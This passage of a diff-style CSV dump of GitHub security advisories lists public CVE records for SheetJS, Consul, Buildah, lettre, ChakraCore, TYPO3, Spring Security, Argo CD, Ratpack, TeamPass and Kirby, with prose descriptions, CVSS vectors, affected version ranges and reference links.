+1.4.0,GHSA-3x9f-74h4-2fqr,2022-02-08T21:02:16Z,2021-07-22T19:48:17Z,,['CVE-2021-32012'],Denial of Service in SheetJS Pro,SheetJS Pro through 0.16.9 allows attackers to cause a denial of service (memory consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js (issue 1 of 2).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'xlsx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:xlsx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32012'}, {'type': 'WEB', 'url': 'https://floqast.com/engineering-blog/post/fuzzing-and-parsing-securely/'}, {'type': 'WEB', 'url': 'https://sheetjs.com/pro'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/xlsx/v/0.17.0'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T21:44:38Z', 'nvd_published_at': '2021-07-19T14:15:00Z'}"
+1.4.0,GHSA-r9w6-rhh9-7v53,2021-07-27T15:08:01Z,2021-07-28T17:57:57Z,,['CVE-2020-7955'],Incorrect Authorization in HashiCorp Consul,"HashiCorp Consul and Consul Enterprise 1.4.1 through 1.6.2 did not uniformly enforce ACLs across all API endpoints, resulting in potential unintended information disclosure. Fixed in 1.6.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.1'}, {'fixed': '1.6.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.6.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7955'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/issues/7160'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/consul/'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T15:08:01Z', 'nvd_published_at': '2020-01-31T13:15:00Z'}"
+1.4.0,GHSA-7638-r9r3-rmjj,2023-08-29T18:32:51Z,2021-07-19T15:19:09Z,,['CVE-2021-3602'],Buildah processes using chroot isolation may leak environment values to intermediate processes,"### Impact
+When running processes using ""chroot"" isolation, the process being run can examine the environment variables of its immediate parent and grandparent processes (CVE-2021-3602). This isolation type is often used when running `buildah` in unprivileged containers, and it is often used to do so in CI/CD environments. If sensitive information is exposed to the original `buildah` process through its environment, that information will unintentionally be shared with child processes which it starts as part of handling RUN instructions or during `buildah run`. The commands that `buildah` is instructed to run can read that information if they choose to.
+
+### Patches
+Users should upgrade packages, or images which contain packages, to include version 1.21.3 or later.
+
+### Workarounds
+As a workaround, invoking `buildah` in a container under `env -i` to have it started with a reinitialized environment should prevent the leakage.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [buildah](https://github.com/containers/buildah/issues)
+* Email us at [the buildah general mailing list](mailto:buildah@lists.buildah.io), or [the podman security mailing list](mailto:security@lists.podman.io) if it's sensitive.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containers/buildah'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.16.7'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containers/buildah'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.17.0'}, {'fixed': '1.17.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.17.1'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containers/buildah'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.18.0'}, {'fixed': '1.19.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.19.8'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containers/buildah'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.20.0'}, {'fixed': '1.21.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.21.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/containers/buildah/security/advisories/GHSA-7638-r9r3-rmjj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3602'}, {'type': 'WEB', 'url': 'https://github.com/containers/buildah/commit/a468ce0ffd347035d53ee0e26c205ef604097fb0'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1969264'}, {'type': 'PACKAGE', 'url': 'https://github.com/containers/buildah'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0345'}, {'type': 'WEB', 'url': 'https://ubuntu.com/security/CVE-2021-3602'}]","{'cwe_ids': ['CWE-200', 'CWE-212'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-15T20:26:57Z', 'nvd_published_at': '2022-03-03T19:15:00Z'}"
+1.4.0,GHSA-qc36-q22q-cjw3,2021-08-18T18:52:26Z,2021-07-12T17:03:27Z,,['CVE-2021-38189'],SMTP command injection in lettre,"### Impact
+
+Affected versions of lettre allowed SMTP command injection through an attacker's controlled message body. The module for escaping lines starting with a period wouldn't catch a period that was placed after a double CRLF sequence, allowing the attacker to end the current message and write arbitrary SMTP commands after it.
+
+### Fix
+
+The flaw is fixed by correctly handling consecutive CRLF sequences.
+
+### References
+
+* [RUSTSEC-2021-0069](https://rustsec.org/advisories/RUSTSEC-2021-0069.html)
+
+
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lettre'}, 'ecosystem_specific': {'affected_functions': ['lettre::smtp::SmtpTransport::send', 'lettre::transport::smtp::SmtpTransport::send', 'lettre::transport::smtp::SmtpTransport::send_raw']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.0'}, {'fixed': '0.9.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/lettre/lettre/security/advisories/GHSA-qc36-q22q-cjw3'}, {'type': 'WEB', 'url': 'https://github.com/lettre/lettre/pull/627/commits/93458d01fed0ec81c0e7b4e98e6f35961356fae2'}, {'type': 'WEB', 'url': 'https://github.com/lettre/lettre/commit/8bfc20506cc5e098fe6eb3d1cafe3bea791215ce'}, {'type': 'PACKAGE', 'url': 'https://github.com/lettre/lettre'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0069.html'}]","{'cwe_ids': ['CWE-147'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T20:41:39Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-j89m-gcjf-6ghp,2021-07-27T14:28:19Z,2021-07-28T18:57:02Z,,['CVE-2020-0825'], Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0825'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0825'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:28:19Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}"
+1.4.0,GHSA-rgcg-28xm-8mmw,2021-07-22T19:37:32Z,2021-07-22T19:37:41Z,,['CVE-2021-32669'],Cross-Site Scripting in Backend Grid View,"### Problem
+Failing to properly encode settings for _backend layouts_, the corresponding grid view is vulnerable to persistent cross-site scripting. A valid backend user account is needed to exploit this vulnerability.
+
+### Solution
+Update to TYPO3 versions 8.7.41 ELTS, 9.5.28, 10.4.18, 11.3.1 that fix the problem described.
+
+### Credits
+Thanks to TYPO3 core merger Oliver Bartsch who reported and fixed the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.41'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.28'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-rgcg-28xm-8mmw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32669'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-011'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-20T17:43:42Z', 'nvd_published_at': '2021-07-20T16:15:00Z'}"
+1.4.0,GHSA-w9jg-gvgr-354m,2022-03-30T21:15:14Z,2021-07-02T18:33:34Z,,['CVE-2021-22119'],Resource Exhaustion in Spring Security,"Spring Security versions 5.5.x prior to 5.5.1, 5.4.x prior to 5.4.7, 5.3.x prior to 5.3.10 and 5.2.x prior to 5.2.11 are susceptible to a Denial-of-Service (DoS) attack via the initiation of the Authorization Request in an OAuth 2.0 Client Web and WebFlux application. A malicious user or attacker can send multiple requests initiating the Authorization Request for the Authorization Code Grant, which has the potential of exhausting system resources using a single session or multiple sessions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.5.0'}, {'fixed': '5.5.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.4.0'}, {'fixed': '5.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.3.9'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.2.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.10'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-oauth2-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.5.0'}, {'fixed': '5.5.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-oauth2-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.4.0'}, {'fixed': '5.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-oauth2-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.3.9'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-oauth2-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.2.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.10'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22119'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-security/pull/9513'}, {'type': 'PACKAGE', 'url': 'https://github.com/spring-projects/spring-security'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r08a449010786e0bcffa4b5781b04fcb55d6eafa62cb79b8347680aad@%3Cissues.nifi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r163b3e4e39803882f5be05ee8606b2b9812920e196daa2a82997ce14@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3868207b967f926819fe3aa8d33f1666429be589bb4a62104a49f4e3@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r390783b3b1c59b978131ac08390bf77fbb3863270cbde59d5b0f5fde@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r89aa1b48a827f5641310305214547f1d6b2101971a49b624737c497f@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra53677224fe4f04c2599abc88032076faa18dc84b329cdeba85d4cfc@%3Cpluto-scm.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2021-22119'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-400', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:30:10Z', 'nvd_published_at': '2021-06-29T17:15:00Z'}"
+1.4.0,GHSA-g973-978j-2c3p,2022-02-08T21:02:26Z,2021-07-22T19:47:15Z,,['CVE-2021-32014'],Denial of Service in SheetJS Pro,SheetJS Pro through 0.16.9 allows attackers to cause a denial of service (CPU consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'xlsx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:xlsx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32014'}, {'type': 'WEB', 'url': 'https://floqast.com/engineering-blog/post/fuzzing-and-parsing-securely/'}, {'type': 'WEB', 'url': 'https://sheetjs.com/pro'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/xlsx/v/0.17.0'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-345', 'CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T21:44:42Z', 'nvd_published_at': '2021-07-19T14:15:00Z'}"
+1.4.0,GHSA-h8jc-jmrf-9h8f,2023-09-25T17:30:03Z,2021-07-26T21:19:27Z,,['CVE-2020-8828'],Argo CD Insecure default administrative password,"In Argo CD versions 1.8.0 and prior, the default admin password is set to the argocd-server pod name. For insiders with access to the cluster or logs, this issue could be abused for privilege escalation, as Argo has privileged roles. A malicious insider is the most realistic threat, but pod names are not meant to be kept secret and could wind up just about anywhere.
+
+#### Workaround:
+
+The recommended mitigation as described in the user documentation is to use SSO integration. The default admin password should only be used for initial configuration and then [disabled](https://argo-cd.readthedocs.io/en/stable/operator-manual/user-management/#disable-admin-user) or at least changed to a more secure password.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8828'}, {'type': 'WEB', 'url': 'https://argo-cd.readthedocs.io/en/stable/security_considerations/#cve-2020-8828-insecure-default-administrative-password'}, {'type': 'WEB', 'url': 'https://argoproj.github.io/argo-cd/security_considerations/'}, {'type': 'PACKAGE', 'url': 'https://github.com/argoproj/argo-cd'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/blob/129cf5370f9e2c6f99c9a5515099250a7ba42099/docs/security_considerations.md#cve-2020-8828---insecure-default-administrative-password'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo/releases'}, {'type': 'WEB', 'url': 'https://www.soluble.ai/blog/argo-cves-2020'}]","{'cwe_ids': ['CWE-1188', 'CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T21:14:45Z', 'nvd_published_at': '2020-04-08T20:15:00Z'}"
+1.4.0,GHSA-2cc5-23r7-vc4v,2022-08-11T00:17:56Z,2021-07-01T17:02:26Z,,['CVE-2021-29480'],Ratpack's default client side session signing key is highly predictable,"### Impact
+
+The client side session module uses the application startup time as the signing key by default. This means that if an attacker can determine this time, and if encryption is not also used (which is recommended, but is not on by default), the session data could be tampered with by someone with the ability to write cookies.
+
+The default configuration is unsuitable for production use as an application restart renders all sessions invalid and is not multi-host compatible, but its use is not actively prevented.
+
+### Vulnerability Location
+
+https://github.com/ratpack/ratpack/blob/29434f7ac6fd4b36a4495429b70f4c8163100332/ratpack-session/src/main/java/ratpack/session/clientside/ClientSideSessionConfig.java#L29
+
+### Patches
+
+As of Ratpack 1.9.0 the default value is a securely randomly generated value, generated at application startup time.
+
+### Workarounds
+
+Supply an alternative signing key, as per the documentation's recommendation.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.ratpack:ratpack-session'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ratpack/ratpack/security/advisories/GHSA-2cc5-23r7-vc4v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29480'}, {'type': 'PACKAGE', 'url': 'https://github.com/ratpack/ratpack'}, {'type': 'WEB', 'url': 'https://github.com/ratpack/ratpack/blob/29434f7ac6fd4b36a4495429b70f4c8163100332/ratpack-session/src/main/java/ratpack/session/clientside/ClientSideSessionConfig.java#L29'}]","{'cwe_ids': ['CWE-330', 'CWE-340'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:49:41Z', 'nvd_published_at': '2021-06-29T19:15:00Z'}"
+1.4.0,GHSA-gmr7-m73x-6c9q,2021-07-26T21:11:19Z,2021-07-26T21:22:13Z,,['CVE-2020-11671'],Missing Authorization in TeamPass,Lack of authorization controls in REST API functions in TeamPass through 2.1.27.36 allows any TeamPass user with a valid API token to become a TeamPass administrator and read/modify all passwords via authenticated api/index.php REST API calls. NOTE: the API is not available by default.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.27.36'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11671'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/TeamPass/issues/2765'}]","{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T21:11:19Z', 'nvd_published_at': '2020-05-04T14:15:00Z'}"
+1.4.0,GHSA-7j34-xq9v-9mqg,2021-07-27T14:36:16Z,2021-07-28T18:56:52Z,,['CVE-2020-0827'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0827'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0827'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:36:16Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}"
+1.4.0,GHSA-6mh3-j5r5-2379,2021-08-31T21:22:46Z,2021-07-22T19:36:58Z,,['CVE-2021-32668'],Cross-Site Scripting in Query Generator & Query View,"> ### Meta
+> * CVSS: `CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C` (4.5)
+
+### Problem
+Failing to properly encode error messages, the components _QueryGenerator_ and _QueryView_ are vulnerable to both reflected and persistent cross-site scripting. A valid backend user account having administrator privileges is needed to exploit this vulnerability.
+
+### Solution
+Update to TYPO3 versions 8.7.41 ELTS, 9.5.28, 10.4.18, 11.3.1 that fix the problem described.
+
+### Credits
+Thanks to Richie Lee who reported this issue and to TYPO3 security team member Oliver Hader who fixed the issue.
+
+### References
+* [TYPO3-CORE-SA-2021-010](https://typo3.org/security/advisory/typo3-core-sa-2021-010)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.41'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.28'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '< 11.3.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-6mh3-j5r5-2379'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-6mh3-j5r5-2379'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32668'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-010'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-20T17:42:11Z', 'nvd_published_at': '2021-07-20T15:15:00Z'}"
+1.4.0,GHSA-8h2g-r292-j8xh,2022-08-11T20:43:23Z,2021-07-19T21:21:12Z,,['CVE-2021-36213'],HashiCorp Consul L7 deny intention results in an allow action,"In HashiCorp Consul before 1.10.1 (and Consul Enterprise), xds can generate a situation where a single L7 deny intention (with a default deny policy) results in an allow action.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36213'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-16-consul-s-application-aware-intentions-deny-action-fails-open-when-combined-with-default-deny-policy/26855'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/consul/'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/releases/tag/v1.10.1'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-09'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/consul'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T17:33:14Z', 'nvd_published_at': '2021-07-17T18:15:00Z'}"
+1.4.0,GHSA-2f2w-349x-vrqm,2023-04-14T19:24:30Z,2021-07-02T19:18:43Z,,['CVE-2021-32735'],Cross-site scripting (XSS) from field and configuration text displayed in the Panel,"On Saturday, @hdodov reported that the Panel's `ListItem` component (used in the pages and files section for example) displayed HTML in page titles as it is. This could be used for cross-site scripting (XSS) attacks.
+
+We used his report as an opportunity to find and fix XSS issues related to dynamic site content throughout the Panel codebase.
+
+### Impact
+
+Cross-site scripting (XSS) is a type of vulnerability that allows to execute any kind of JavaScript code inside the Panel session of other users. In the Panel, a harmful script can for example trigger requests to Kirby's API with the permissions of the victim.
+
+Such vulnerabilities are critical if you might have potential attackers in your group of authenticated Panel users. They can escalate their privileges if they get access to the Panel session of an admin user. Depending on your site, other JavaScript-powered attacks are possible.
+
+Visitors without Panel access can only use this attack vector if your site allows changing site data from a frontend form (for example user self-registration or the creation of pages from a contact or other frontend form). If you validate or sanitize the provided form data, you are already protected against such attacks by external visitors.
+
+### Patches
+
+[Kirby 3.5.7](https://github.com/getkirby/kirby/releases/tag/3.5.7) contains patches for the following issues we found during our investigation:
+
+- Some translated error and info messages contain placeholders to dynamically insert information like page titles or filenames. While the translation strings are allowed to contain HTML formatting, the dynamic data needs to be protected against XSS attacks. Kirby 3.5.7 now escapes the dynamic data.
+- Our `Box` component used to display information for the user supports HTML output for specific use-cases. We found out that the dialogs used in the `files`, `pages` and `users` fields as well as the `fields` section used it to display raw exception or error messages. These messages are now escaped.
+- The users and settings views display user and language data using the `ListItem` component that supports HTML. We now escape the dynamic data before it is passed to the `ListItem` component.
+- Some of our sections and fields support HTML for their `text`, `help` and/or `info` properties. This allows custom formatting from the blueprint, but also caused the original issue reported to us that allowed to inject HTML code from the content itself. Kirby 3.5.7 now escapes the default `text` displayed by the `files` and `pages` sections (filename/page title), the `files`, `pages` and `users` fields (filename/page title/username) and by query-based `checkboxes`, `radio`, `tags` and `multiselect` fields (default text depending on the used query).
+
